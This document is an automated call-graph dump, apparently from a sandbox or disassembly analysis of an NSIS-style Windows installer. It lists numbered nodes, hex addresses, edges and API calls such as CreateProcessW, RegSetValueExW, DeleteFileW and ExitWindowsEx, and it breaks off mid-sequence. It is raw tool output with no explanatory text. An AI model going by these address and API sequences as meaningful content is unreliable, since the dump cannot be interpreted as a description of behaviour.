4141->4143 4175 403d18 4142->4175 4143->4122 4143->4142 4145 405705 GetDlgItem 4146 405723 ShowWindow KiUserCallbackDispatcher 4145->4146 4147 40571a 4145->4147 4172 403d85 KiUserCallbackDispatcher 4146->4172 4147->4146 4149 40574d EnableWindow 4152 405761 4149->4152 4150 405766 GetSystemMenu EnableMenuItem SendMessageW 4151 405796 SendMessageW 4150->4151 4150->4152 4151->4152 4152->4150 4173 403d98 SendMessageW 4152->4173 4174 406009 lstrcpynW 4152->4174 4155 4057c4 lstrlenW 4156 406805 18 API calls 4155->4156 4157 4057da SetWindowTextW 4156->4157 4158 40139d 80 API calls 4157->4158 4158->4139 4160 405838 CreateDialogParamW 4159->4160 4159->4168 4161 40586b 4160->4161 4160->4168 4162 403d3f 19 API calls 4161->4162 4163 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4162->4163 4164 40139d 80 API calls 4163->4164 4165 4058bc 4164->4165 4165->4129 4166 4058c4 ShowWindow 4165->4166 4167 403daf SendMessageW 4166->4167 4167->4168 4168->4126 4168->4129 4170 406805 18 API calls 4169->4170 4171 403d4a SetDlgItemTextW 4170->4171 4171->4145 4172->4149 4173->4152 4174->4155 4176 403d25 SendMessageW 4175->4176 4177 403d1f 4175->4177 4176->4138 4177->4176 4179 403ddf GetWindowLongW 4178->4179 4189 403e68 4178->4189 4180 403df0 4179->4180 4179->4189 4181 403e02 4180->4181 4182 403dff GetSysColor 4180->4182 4183 403e12 SetBkMode 4181->4183 4184 403e08 SetTextColor 4181->4184 4182->4181 4185 403e30 4183->4185 4186 403e2a GetSysColor 4183->4186 4184->4183 4187 403e41 4185->4187 4188 403e37 SetBkColor 4185->4188 4186->4185 4187->4189 4190 403e54 DeleteObject 4187->4190 4191 403e5b CreateBrushIndirect 4187->4191 4188->4187 4189->4129 4190->4191 4191->4189 4732 4020f9 GetDC GetDeviceCaps 4733 401446 18 API calls 4732->4733 4734 402116 MulDiv 4733->4734 4735 401446 18 API calls 4734->4735 4736 40212c 4735->4736 4737 406805 18 API calls 4736->4737 4738 402165 CreateFontIndirectW 4737->4738 4739 4030dc 4738->4739 4740 4030e3 4739->4740 4742 405f51 wsprintfW 4739->4742 4742->4740 4743 4024fb 4744 40145c 18 API calls 4743->4744 4745 402502 4744->4745 4746 40145c 18 API calls 4745->4746 4747 40250c 4746->4747 4748 40145c 18 API calls 4747->4748 4749 402515 4748->4749 4750 40145c 18 API calls 4749->4750 4751 40251f 4750->4751 4752 40145c 18 API calls 4751->4752 4753 402529 4752->4753 4754 40253d 4753->4754 4755 40145c 18 API calls 4753->4755 4756 4062a3 11 API calls 4754->4756 4755->4754 4757 40256a CoCreateInstance 4756->4757 4758 40258c 4757->4758 4759 40497c GetDlgItem GetDlgItem 4760 4049d2 7 API calls 4759->4760 4765 404bea 4759->4765 4761 404a76 DeleteObject 4760->4761 4762 404a6a SendMessageW 4760->4762 4763 404a81 4761->4763 4762->4761 4766 404ab8 4763->4766 4768 406805 18 API calls 4763->4768 4764 404ccf 4767 404d74 4764->4767 4772 404bdd 4764->4772 4777 404d1e SendMessageW 4764->4777 4765->4764 4775 40484e 5 API calls 4765->4775 4788 404c5a 4765->4788 4771 403d3f 19 API calls 4766->4771 4769 404d89 4767->4769 4770 404d7d SendMessageW 4767->4770 4774 404a9a SendMessageW SendMessageW 4768->4774 4779 404da2 4769->4779 4780 404d9b ImageList_Destroy 4769->4780 4790 404db2 4769->4790 4770->4769 4776 404acc 4771->4776 4778 403dca 8 API calls 4772->4778 4773 404cc1 SendMessageW 4773->4764 4774->4763 4775->4788 4781 403d3f 19 API calls 4776->4781 4777->4772 4783 404d33 SendMessageW 4777->4783 4784 404f6b 4778->4784 4785 404dab GlobalFree 4779->4785 4779->4790 4780->4779 4786 404add 4781->4786 4782 404f1c 4782->4772 4791 404f31 ShowWindow GetDlgItem ShowWindow 4782->4791 4787 404d46 4783->4787 4785->4790 4789 404baa GetWindowLongW SetWindowLongW 4786->4789 4798 404ba4 4786->4798 4801 404b39 SendMessageW 4786->4801 4802 404b67 SendMessageW 4786->4802 4803 404b7b SendMessageW 4786->4803 4797 404d57 SendMessageW 4787->4797 4788->4764 4788->4773 4792 404bc4 4789->4792 4790->4782 4793 404de4 4790->4793 4796 40141d 80 API calls 4790->4796 4791->4772 4794 404be2 4792->4794 4795 404bca ShowWindow 4792->4795 4806 404e12 SendMessageW 4793->4806 4809 404e28 4793->4809 4811 403d98 SendMessageW 4794->4811 4810 403d98 SendMessageW 4795->4810 4796->4793 4797->4767 4798->4789 4798->4792 4801->4786 4802->4786 4803->4786 4804 404ef3 InvalidateRect 4804->4782 4805 404f09 4804->4805 4812 4043ad 4805->4812 4806->4809 4808 404ea1 SendMessageW SendMessageW 4808->4809 4809->4804 4809->4808 4810->4772 4811->4765 4813 4043cd 4812->4813 4814 406805 18 API calls 4813->4814 4815 40440d 4814->4815 4816 406805 18 API calls 4815->4816 4817 404418 4816->4817 4818 406805 18 API calls 4817->4818 4819 404428 lstrlenW wsprintfW SetDlgItemTextW 4818->4819 4819->4782 4820 4026fc 4821 401ee4 4820->4821 4823 402708 4820->4823 4821->4820 4822 406805 18 API calls 4821->4822 4822->4821 4272 4019fd 4273 40145c 18 API calls 4272->4273 4274 401a04 4273->4274 4275 405e7f 2 API calls 4274->4275 4276 401a0b 4275->4276 4824 4022fd 4825 40145c 18 API calls 4824->4825 4826 402304 GetFileVersionInfoSizeW 4825->4826 4827 40232b GlobalAlloc 4826->4827 4831 4030e3 4826->4831 4828 40233f GetFileVersionInfoW 4827->4828 4827->4831 4829 402350 VerQueryValueW 4828->4829 4830 402381 GlobalFree 4828->4830 4829->4830 4833 402369 4829->4833 4830->4831 4837 405f51 wsprintfW 4833->4837 4835 402375 4838 405f51 wsprintfW 4835->4838 4837->4835 4838->4830 4839 402afd 4840 40145c 18 API calls 4839->4840 4841 402b04 4840->4841 4846 405e50 GetFileAttributesW CreateFileW 4841->4846 4843 402b10 4844 4030e3 4843->4844 4847 405f51 wsprintfW 4843->4847 4846->4843 4847->4844 4848 4029ff 4849 401553 19 API calls 4848->4849 4850 402a09 4849->4850 4851 40145c 18 API calls 4850->4851 4852 402a12 4851->4852 4853 402a1f RegQueryValueExW 4852->4853 4855 401a13 4852->4855 4854 402a3f 4853->4854 4858 402a45 4853->4858 4854->4858 4859 405f51 wsprintfW 4854->4859 4857 4029e4 RegCloseKey 4857->4855 4858->4855 4858->4857 4859->4858 4860 401000 4861 401037 BeginPaint GetClientRect 4860->4861 4862 40100c DefWindowProcW 4860->4862 4864 4010fc 4861->4864 4865 401182 4862->4865 4866 401073 CreateBrushIndirect FillRect DeleteObject 4864->4866 4867 401105 4864->4867 4866->4864 4868 401170 EndPaint 4867->4868 4869 40110b CreateFontIndirectW 4867->4869 4868->4865 4869->4868 4870 40111b 6 API calls 4869->4870 4870->4868 4871 401f80 4872 401446 18 API calls 4871->4872 4873 401f88 4872->4873 4874 401446 18 API calls 4873->4874 4875 401f93 4874->4875 4876 401fa3 4875->4876 4877 40145c 18 API calls 4875->4877 4878 401fb3 4876->4878 4879 40145c 18 API calls 4876->4879 4877->4876 4880 402006 4878->4880 4881 401fbc 4878->4881 4879->4878 4883 40145c 18 API calls 4880->4883 4882 401446 18 API calls 4881->4882 4885 401fc4 4882->4885 4884 40200d 4883->4884 4886 40145c 18 API calls 4884->4886 4887 401446 18 API calls 4885->4887 4888 402016 FindWindowExW 4886->4888 4889 401fce 4887->4889 4893 402036 4888->4893 4890 401ff6 SendMessageW 4889->4890 4891 401fd8 SendMessageTimeoutW 4889->4891 4890->4893 4891->4893 4892 4030e3 4893->4892 4895 405f51 wsprintfW 4893->4895 4895->4892 4896 402880 4897 402884 4896->4897 4898 40145c 18 API calls 4897->4898 4899 4028a7 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028b1 4900->4901 4902 4028ba RegCreateKeyExW 4901->4902 4903 4028e8 4902->4903 4910 4029ef 4902->4910 4904 402934 4903->4904 4905 40145c 18 API calls 4903->4905 4906 402963 4904->4906 4909 401446 18 API calls 4904->4909 4908 4028fc lstrlenW 4905->4908 4907 4029ae RegSetValueExW 4906->4907 4911 40337f 37 API calls 4906->4911 4914 4029c6 RegCloseKey 4907->4914 4915 4029cb 4907->4915 4912 402918 4908->4912 4913 40292a 4908->4913 4916 402947 4909->4916 4917 40297b 4911->4917 4918 4062a3 11 API calls 4912->4918 4919 4062a3 11 API calls 4913->4919 4914->4910 4920 4062a3 11 API calls 4915->4920 4921 4062a3 11 API calls 4916->4921 4927 406224 4917->4927 4923 402922 4918->4923 4919->4904 4920->4914 4921->4906 4923->4907 4926 4062a3 11 API calls 4926->4923 4928 406247 4927->4928 4929 40628a 4928->4929 4930 40625c wsprintfW 4928->4930 4931 402991 4929->4931 4932 406293 lstrcatW 4929->4932 4930->4929 4930->4930 4931->4926 4932->4931 4933 402082 4934 401446 18 API calls 4933->4934 4935 402093 SetWindowLongW 4934->4935 4936 4030e3 4935->4936 3462 403883 #17 SetErrorMode OleInitialize 3535 4062fc GetModuleHandleA 3462->3535 3466 4038f1 GetCommandLineW 3540 406009 lstrcpynW 3466->3540 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3541 405d06 3469->3541 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3545 4037cc 3473->3545 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3553 403587 GetTickCount GetModuleFileNameW 3476->3553 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3668 403859 3483->3668 3485->3472 3485->3478 3493 4039d8 3485->3493 3581 40592c 3486->3581 3499 403a5e 3487->3499 3490 403ac1 3655 4060e7 3490->3655 3491 403ae1 3675 405ca0 3491->3675 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3638 406009 lstrcpynW 3493->3638 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3639 40677e 3503->3639 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3680 406009 lstrcpynW 3509->3680 3679 406009 lstrcpynW 3510->3679 3515 403bef 3511->3515 3514 403b44 3681 406009 lstrcpynW 3514->3681 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3654 406009 lstrcpynW 3519->3654 3708 40141d 3520->3708 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3532 406805 18 API calls 3529->3532 3534 403bad CloseHandle 3529->3534 3682 406805 3529->3682 3700 406c68 3529->3700 3705 405c3f CreateProcessW 3529->3705 3530->3483 3532->3529 3534->3529 3536 406314 LoadLibraryA 3535->3536 3537 40631f GetProcAddress 3535->3537 3536->3537 3538 4038c6 SHGetFileInfoW 3536->3538 3537->3538 3539 406009 lstrcpynW 3538->3539 3539->3466 3540->3468 3542 405d0c 3541->3542 3543 40392a CharNextW 3542->3543 3544 405d13 CharNextW 3542->3544 3543->3485 3544->3542 3711 406038 3545->3711 3547 4037e2 3547->3475 3548 4037d8 3548->3547 3720 406722 lstrlenW CharPrevW 3548->3720 3727 405e50 GetFileAttributesW CreateFileW 3553->3727 3555 4035c7 3576 4035d7 3555->3576 3728 406009 lstrcpynW 3555->3728 3557 4035ed 3729 406751 lstrlenW 3557->3729 3561 4035fe GetFileSize 3562 4036fa 3561->3562 3575 403615 3561->3575 3736 4032d2 3562->3736 3564 403703 3566 40373f GlobalAlloc 3564->3566 3564->3576 3770 403368 SetFilePointer 3564->3770 3747 403368 SetFilePointer 3566->3747 3568 4037bd 3572 4032d2 6 API calls 3568->3572 3570 40375a 3748 40337f 3570->3748 3571 403720 3574 403336 ReadFile 3571->3574 3572->3576 3577 40372b 3574->3577 3575->3562 3575->3568 3575->3576 3578 4032d2 6 API calls 3575->3578 3734 403336 ReadFile 3575->3734 3576->3482 3577->3566 3577->3576 3578->3575 3579 403766 3579->3576 3579->3579 3580 403794 SetFilePointer 3579->3580 3580->3576 3582 4062fc 3 API calls 3581->3582 3583 405940 3582->3583 3584 405946 3583->3584 3585 405958 3583->3585 3811 405f51 wsprintfW 3584->3811 3812 405ed3 RegOpenKeyExW 3585->3812 3589 4059a8 lstrcatW 3591 405956 3589->3591 3590 405ed3 3 API calls 3590->3589 3794 403e95 3591->3794 3594 40677e 18 API calls 3595 4059da 3594->3595 3596 405a70 3595->3596 3598 405ed3 3 API calls 3595->3598 3597 40677e 18 API calls 3596->3597 3599 405a76 3597->3599 3600 405a0c 3598->3600 3601 405a86 3599->3601 3602 406805 18 API calls 3599->3602 3600->3596 3606 405a2f lstrlenW 3600->3606 3612 405d06 CharNextW 3600->3612 3603 405aa6 LoadImageW 3601->3603 3818 403e74 3601->3818 3602->3601 3604 405ad1 RegisterClassW 3603->3604 3605 405b66 3603->3605 3610 405b19 SystemParametersInfoW CreateWindowExW 3604->3610 3635 405b70 3604->3635 3611 40141d 80 API calls 3605->3611 3607 405a63 3606->3607 3608 405a3d lstrcmpiW 3606->3608 3615 406722 3 API calls 3607->3615 3608->3607 3613 405a4d GetFileAttributesW 3608->3613 3610->3605 3616 405b6c 3611->3616 3617 405a2a 3612->3617 3618 405a59 3613->3618 3614 405a9c 3614->3603 3619 405a69 3615->3619 3622 403e95 19 API calls 3616->3622 3616->3635 3617->3606 3618->3607 3620 406751 2 API calls 3618->3620 3817 406009 lstrcpynW 3619->3817 3620->3607 3623 405b7d 3622->3623 3624 405b89 ShowWindow LoadLibraryW 3623->3624 3625 405c0c 3623->3625 3627 405ba8 LoadLibraryW 3624->3627 3628 405baf GetClassInfoW 3624->3628 3803 405047 OleInitialize 3625->3803 3627->3628 3629 405bc3 GetClassInfoW RegisterClassW 3628->3629 3630 405bd9 DialogBoxParamW 3628->3630 3629->3630 3632 40141d 80 API calls 3630->3632 3631 405c12 3633 405c16 3631->3633 3634 405c2e 3631->3634 3632->3635 3633->3635 3637 40141d 80 API calls 3633->3637 3636 40141d 80 API calls 3634->3636 3635->3490 3636->3635 3637->3635 3638->3473 3963 406009 lstrcpynW 3639->3963 3641 40678f 3642 405d59 4 API calls 3641->3642 3643 406795 3642->3643 3644 406038 5 API calls 3643->3644 3651 403a97 3643->3651 3650 4067a5 3644->3650 3645 4067dd lstrlenW 3646 4067e4 3645->3646 3645->3650 3647 406722 3 API calls 3646->3647 3649 4067ea GetFileAttributesW 3647->3649 3648 4062d5 2 API calls 3648->3650 3649->3651 3650->3645 3650->3648 3650->3651 3652 406751 2 API calls 3650->3652 3651->3483 3653 406009 lstrcpynW 3651->3653 3652->3645 3653->3519 3654->3486 3656 406110 3655->3656 3657 4060f3 3655->3657 3659 406187 3656->3659 3660 40612d 3656->3660 3663 406104 3656->3663 3658 4060fd CloseHandle 3657->3658 3657->3663 3658->3663 3661 406190 lstrcatW lstrlenW WriteFile 3659->3661 3659->3663 3660->3661 3662 406136 GetFileAttributesW 3660->3662 3661->3663 3964 405e50 GetFileAttributesW CreateFileW 3662->3964 3663->3483 3665 406152 3665->3663 3666 406162 WriteFile 3665->3666 3667 40617c SetFilePointer 3665->3667 3666->3667 3667->3659 3669 403871 3668->3669 3670 403863 CloseHandle 3668->3670 3965 403c83 3669->3965 3670->3669 3676 405cb5 3675->3676 3677 403aef ExitProcess 3676->3677 3678 405ccb MessageBoxIndirectW 3676->3678 3678->3677 3679->3509 3680->3514 3681->3529 3697 406812 3682->3697 3683 406a7f 3684 403b6c DeleteFileW 3683->3684 4022 406009 lstrcpynW 3683->4022 3684->3527 3684->3529 3686 4068d3 GetVersion 3686->3697 3687 406a46 lstrlenW 3687->3697 3688 406805 10 API calls 3688->3687 3691 405ed3 3 API calls 3691->3697 3692 406952 GetSystemDirectoryW 3692->3697 3693 406965 GetWindowsDirectoryW 3693->3697 3694 406038 5 API calls 3694->3697 3695 406805 10 API calls 3695->3697 3696 4069df lstrcatW 3696->3697 3697->3683 3697->3686 3697->3687 3697->3688 3697->3691 3697->3692 3697->3693 3697->3694 3697->3695 3697->3696 3698 406999 SHGetSpecialFolderLocation 3697->3698 4020 405f51 wsprintfW 3697->4020 4021 406009 lstrcpynW 3697->4021 3698->3697 3699 4069b1 SHGetPathFromIDListW CoTaskMemFree 3698->3699 3699->3697 3701 4062fc 3 API calls 3700->3701 3702 406c6f 3701->3702 3704 406c90 3702->3704 4023 406a99 lstrcpyW 3702->4023 3704->3529 3706 405c7a 3705->3706 3707 405c6e CloseHandle 3705->3707 3706->3529 3707->3706 3709 40139d 80 API calls 3708->3709 3710 401432 3709->3710 3710->3495 3717 406045 3711->3717 3712 4060bb 3713 4060c1 CharPrevW 3712->3713 3715 4060e1 3712->3715 3713->3712 3714 4060ae CharNextW 3714->3712 3714->3717 3715->3548 3716 405d06 CharNextW 3716->3717 3717->3712 3717->3714 3717->3716 3718 40609a CharNextW 3717->3718 3719 4060a9 CharNextW 3717->3719 3718->3717 3719->3714 3721 4037ea CreateDirectoryW 3720->3721 3722 40673f lstrcatW 3720->3722 3723 405e7f 3721->3723 3722->3721 3724 405e8c GetTickCount GetTempFileNameW 3723->3724 3725 405ec2 3724->3725 3726 4037fe 3724->3726 3725->3724 3725->3726 3726->3475 3727->3555 3728->3557 3730 406760 3729->3730 3731 4035f3 3730->3731 3732 406766 CharPrevW 3730->3732 3733 406009 lstrcpynW 3731->3733 3732->3730 3732->3731 3733->3561 3735 403357 3734->3735 3735->3575 3737 4032f3 3736->3737 3738 4032db 3736->3738 3741 403303 GetTickCount 3737->3741 3742 4032fb 3737->3742 3739 4032e4 DestroyWindow 3738->3739 3740 4032eb 3738->3740 3739->3740 3740->3564 3744 403311 CreateDialogParamW ShowWindow 3741->3744 3745 403334 3741->3745 3771 406332 3742->3771 3744->3745 3745->3564 3747->3570 3750 403398 3748->3750 3749 4033c3 3752 403336 ReadFile 3749->3752 3750->3749 3793 403368 SetFilePointer 3750->3793 3753 4033ce 3752->3753 3754 4033e7 GetTickCount 3753->3754 3755 403518 3753->3755 3757 4033d2 3753->3757 3767 4033fa 3754->3767 3756 40351c 3755->3756 3761 403540 3755->3761 3758 403336 ReadFile 3756->3758 3757->3579 3758->3757 3759 403336 ReadFile 3759->3761 3760 403336 ReadFile 3760->3767 3761->3757 3761->3759 3762 40355f WriteFile 3761->3762 3762->3757 3763 403574 3762->3763 3763->3757 3763->3761 3765 40345c GetTickCount 3765->3767 3766 403485 MulDiv wsprintfW 3782 404f72 3766->3782 3767->3757 3767->3760 3767->3765 3767->3766 3769 4034c9 WriteFile 3767->3769 3775 407312 3767->3775 3769->3757 3769->3767 3770->3571 3772 40634f PeekMessageW 3771->3772 3773 406345 DispatchMessageW 3772->3773 3774 403301 3772->3774 3773->3772 3774->3564 3776 407332 3775->3776 3777 40733a 3775->3777 3776->3767 3777->3776 3778 4073c2 GlobalFree 3777->3778 3779 4073cb GlobalAlloc 3777->3779 3780 407443 GlobalAlloc 3777->3780 3781 40743a GlobalFree 3777->3781 3778->3779 3779->3776 3779->3777 3780->3776 3780->3777 3781->3780 3783 404f8b 3782->3783 3792 40502f 3782->3792 3784 404fa9 lstrlenW 3783->3784 3785 406805 18 API calls 3783->3785 3786 404fd2 3784->3786 3787 404fb7 lstrlenW 3784->3787 3785->3784 3789 404fe5 3786->3789 3790 404fd8 SetWindowTextW 3786->3790 3788 404fc9 lstrcatW 3787->3788 3787->3792 3788->3786 3791 404feb SendMessageW SendMessageW SendMessageW 3789->3791 3789->3792 3790->3789 3791->3792 3792->3767 3793->3749 3795 403ea9 3794->3795 3823 405f51 wsprintfW 3795->3823 3797 403f1d 3798 406805 18 API calls 3797->3798 3799 403f29 SetWindowTextW 3798->3799 3801 403f44 3799->3801 3800 403f5f 3800->3594 3801->3800 3802 406805 18 API calls 3801->3802 3802->3801 3824 403daf 3803->3824 3805 40506a 3808 4062a3 11 API calls 3805->3808 3810 405095 3805->3810 3827 40139d 3805->3827 3806 403daf SendMessageW 3807 4050a5 OleUninitialize 3806->3807 3807->3631 3808->3805 3810->3806 3811->3591 3813 405f07 RegQueryValueExW 3812->3813 3814 405989 3812->3814 3815 405f29 RegCloseKey 3813->3815 3814->3589 3814->3590 3815->3814 3817->3596 3962 406009 lstrcpynW 3818->3962 3820 403e88 3821 406722 3 API calls 3820->3821 3822 403e8e lstrcatW 3821->3822 3822->3614 3823->3797 3825 403dc7 3824->3825 3826 403db8 SendMessageW 3824->3826 3825->3805 3826->3825 3830 4013a4 3827->3830 3828 401410 3828->3805 3830->3828 3831 4013dd MulDiv SendMessageW 3830->3831 3832 4015a0 3830->3832 3831->3830 3833 4015fa 3832->3833 3912 40160c 3832->3912 3834 401601 3833->3834 3835 401742 3833->3835 3836 401962 3833->3836 3837 4019ca 3833->3837 3838 40176e 3833->3838 3839 401650 3833->3839 3840 4017b1 3833->3840 3841 401672 3833->3841 3842 401693 3833->3842 3843 401616 3833->3843 3844 4016d6 3833->3844 3845 401736 3833->3845 3846 401897 3833->3846 3847 4018db 3833->3847 3848 40163c 3833->3848 3849 4016bd 3833->3849 3833->3912 3862 4062a3 11 API calls 3834->3862 3854 401751 ShowWindow 3835->3854 3855 401758 3835->3855 3859 40145c 18 API calls 3836->3859 3852 40145c 18 API calls 3837->3852 3856 40145c 18 API calls 3838->3856 3879 4062a3 11 API calls 3839->3879 3945 40145c 3840->3945 3857 40145c 18 API calls 3841->3857 3939 401446 3842->3939 3851 40145c 18 API calls 3843->3851 3868 401446 18 API calls 3844->3868 3844->3912 3845->3912 3961 405f51 wsprintfW 3845->3961 3858 40145c 18 API calls 3846->3858 3863 40145c 18 API calls 3847->3863 3853 401647 PostQuitMessage 3848->3853 3848->3912 3850 4062a3 11 API calls 3849->3850 3865 4016c7 SetForegroundWindow 3850->3865 3866 40161c 3851->3866 3867 4019d1 SearchPathW 3852->3867 3853->3912 3854->3855 3869 401765 ShowWindow 3855->3869 3855->3912 3870 401775 3856->3870 3871 401678 3857->3871 3872 40189d 3858->3872 3873 401968 GetFullPathNameW 3859->3873 3862->3912 3864 4018e2 3863->3864 3876 40145c 18 API calls 3864->3876 3865->3912 3877 4062a3 11 API calls 3866->3877 3867->3912 3868->3912 3869->3912 3880 4062a3 11 API calls 3870->3880 3881 4062a3 11 API calls 3871->3881 3957 4062d5 FindFirstFileW 3872->3957 3883 40197f 3873->3883 3925 4019a1 3873->3925 3875 40169a 3942 4062a3 lstrlenW wvsprintfW 3875->3942 3886 4018eb 3876->3886 3887 401627 3877->3887 3888 401664 3879->3888 3889 401785 SetFileAttributesW 3880->3889 3890 401683 3881->3890 3907 4062d5 2 API calls 3883->3907 3883->3925 3884 4062a3 11 API calls 3892 4017c9 3884->3892 3895 40145c 18 API calls 3886->3895 3896 404f72 25 API calls 3887->3896 3897 40139d 65 API calls 3888->3897 3898 40179a 3889->3898 3889->3912 3905 404f72 25 API calls 3890->3905 3950 405d59 CharNextW CharNextW 3892->3950 3894 4019b8 GetShortPathNameW 3894->3912 3903 4018f5 3895->3903 3896->3912 3897->3912 3904 4062a3 11 API calls 3898->3904 3899 4018c2 3908 4062a3 11 API calls 3899->3908 3900 4018a9 3906 4062a3 11 API calls 3900->3906 3910 4062a3 11 API calls 3903->3910 3904->3912 3905->3912 3906->3912 3911 401991 3907->3911 3908->3912 3909 4017d4 3913 401864 3909->3913 3916 405d06 CharNextW 3909->3916 3934 4062a3 11 API calls 3909->3934 3914 401902 MoveFileW 3910->3914 3911->3925 3960 406009 lstrcpynW 3911->3960 3912->3830 3913->3890 3915 40186e 3913->3915 3917 401912 3914->3917 3918 40191e 3914->3918 3919 404f72 25 API calls 3915->3919 3921 4017e6 CreateDirectoryW 3916->3921 3917->3890 3923 401942 3918->3923 3928 4062d5 2 API calls 3918->3928 3924 401875 3919->3924 3921->3909 3922 4017fe GetLastError 3921->3922 3926 401827 GetFileAttributesW 3922->3926 3927 40180b GetLastError 3922->3927 3933 4062a3 11 API calls 3923->3933 3956 406009 lstrcpynW 3924->3956 3925->3894 3925->3912 3926->3909 3930 4062a3 11 API calls 3927->3930 3931 401929 3928->3931 3930->3909 3931->3923 3936 406c68 42 API calls 3931->3936 3932 401882 SetCurrentDirectoryW 3932->3912 3935 40195c 3933->3935 3934->3909 3935->3912 3937 401936 3936->3937 3938 404f72 25 API calls 3937->3938 3938->3923 3940 406805 18 API calls 3939->3940 3941 401455 3940->3941 3941->3875 3943 4060e7 9 API calls 3942->3943 3944 4016a7 Sleep 3943->3944 3944->3912 3946 406805 18 API calls 3945->3946 3947 401488 3946->3947 3948 401497 3947->3948 3949 406038 5 API calls 3947->3949 3948->3884 3949->3948 3951 405d76 3950->3951 3952 405d88 3950->3952 3951->3952 3953 405d83 CharNextW 3951->3953 3954 405dac 3952->3954 3955 405d06 CharNextW 3952->3955 3953->3954 3954->3909 3955->3952 3956->3932 3958 4018a5 3957->3958 3959 4062eb FindClose 3957->3959 3958->3899 3958->3900 3959->3958 3960->3925 3961->3912 3962->3820 3963->3641 3964->3665 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4011 403882 OleUninitialize 3972->4011 3974 406e3b 3973->3974 4015 406009 lstrcpynW 3973->4015 3980 4062d5 2 API calls 3974->3980 4000 406e58 3974->4000 3974->4011 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3985 406d2b lstrlenW FindFirstFileW 3979->3985 3982 406e64 3980->3982 3981->3979 3986 406722 3 API calls 3982->3986 3982->4011 3983->3985 3984 4062a3 11 API calls 3984->4011 3985->3974 3990 406d52 3985->3990 3987 406e6e 3986->3987 3989 4062a3 11 API calls 3987->3989 3988 405d06 CharNextW 3988->3990 3991 406e79 3989->3991 3990->3988 3994 406e18 FindNextFileW 3990->3994 4003 406c9b 72 API calls 3990->4003 4010 404f72 25 API calls 3990->4010 4012 4062a3 11 API calls 3990->4012 4013 404f72 25 API calls 3990->4013 4014 406c68 42 API calls 3990->4014 4016 406009 lstrcpynW 3990->4016 4017 405e30 GetFileAttributesW 3990->4017 3992 405e30 2 API calls 3991->3992 3993 406e81 RemoveDirectoryW 3992->3993 3997 406ec4 3993->3997 3998 406e8d 3993->3998 3994->3990 3996 406e30 FindClose 3994->3996 3996->3974 3999 404f72 25 API calls 3997->3999 3998->4000 4001 406e93 3998->4001 3999->4011 4000->3984 4002 4062a3 11 API calls 4001->4002 4004 406e9d 4002->4004 4003->3990 4006 404f72 25 API calls 4004->4006 4008 406ea7 4006->4008 4009 406c68 42 API calls 4008->4009 4009->4011 4010->3994 4011->3491 4011->3492 4012->3990 4013->3990 4014->3990 4015->3976 4016->3990 4018 405e4d DeleteFileW 4017->4018 4019 405e3f SetFileAttributesW 4017->4019 4018->3990 4019->4018 4020->3697 4021->3697 4022->3684 4024 406ae7 GetShortPathNameW 4023->4024 4025 406abe 4023->4025 4026 406b00 4024->4026 4027 406c62 4024->4027 4049 405e50 GetFileAttributesW CreateFileW 4025->4049 4026->4027 4029 406b08 WideCharToMultiByte 4026->4029 4027->3704 4029->4027 4031 406b25 WideCharToMultiByte 4029->4031 4030 406ac7 CloseHandle GetShortPathNameW 4030->4027 4032 406adf 4030->4032 4031->4027 4033 406b3d wsprintfA 4031->4033 4032->4024 4032->4027 4034 406805 18 API calls 4033->4034 4035 406b69 4034->4035 4050 405e50 GetFileAttributesW CreateFileW 4035->4050 4037 406b76 4037->4027 4038 406b83 GetFileSize GlobalAlloc 4037->4038 4039 406ba4 ReadFile 4038->4039 4040 406c58 CloseHandle 4038->4040 4039->4040 4041 406bbe 4039->4041 4040->4027 4041->4040 4051 405db6 lstrlenA 4041->4051 4044 406bd7 lstrcpyA 4047 406bf9 4044->4047 4045 406beb 4046 405db6 4 API calls 4045->4046 4046->4047 4048 406c30 SetFilePointer WriteFile GlobalFree 4047->4048 4048->4040 4049->4030 4050->4037 4052 405df7 lstrlenA 4051->4052 4053 405dd0 lstrcmpiA 4052->4053 4054 405dff 4052->4054 4053->4054 4055 405dee CharNextA 4053->4055 4054->4044 4054->4045 4055->4052 4937 402a84 4938 401553 19 API calls 4937->4938 4939 402a8e 4938->4939 4940 401446 18 API calls 4939->4940 4941 402a98 4940->4941 4942 401a13 4941->4942 4943 402ab2 RegEnumKeyW 4941->4943 4944 402abe RegEnumValueW 4941->4944 4945 402a7e 4943->4945 4944->4942 4944->4945 4945->4942 4946 4029e4 RegCloseKey 4945->4946 4946->4942 4947 402c8a 4948 402ca2 4947->4948 4949 402c8f 4947->4949 4951 40145c 18 API calls 4948->4951 4950 401446 18 API calls 4949->4950 4953 402c97 4950->4953 4952 402ca9 lstrlenW 4951->4952 4952->4953 4954 402ccb WriteFile 4953->4954 4955 401a13 4953->4955 4954->4955 4956 40400d 4957 40406a 4956->4957 4958 40401a lstrcpynA lstrlenA 4956->4958 4958->4957 4959 40404b 4958->4959 4959->4957 4960 404057 GlobalFree 4959->4960 4960->4957 4961 401d8e 4962 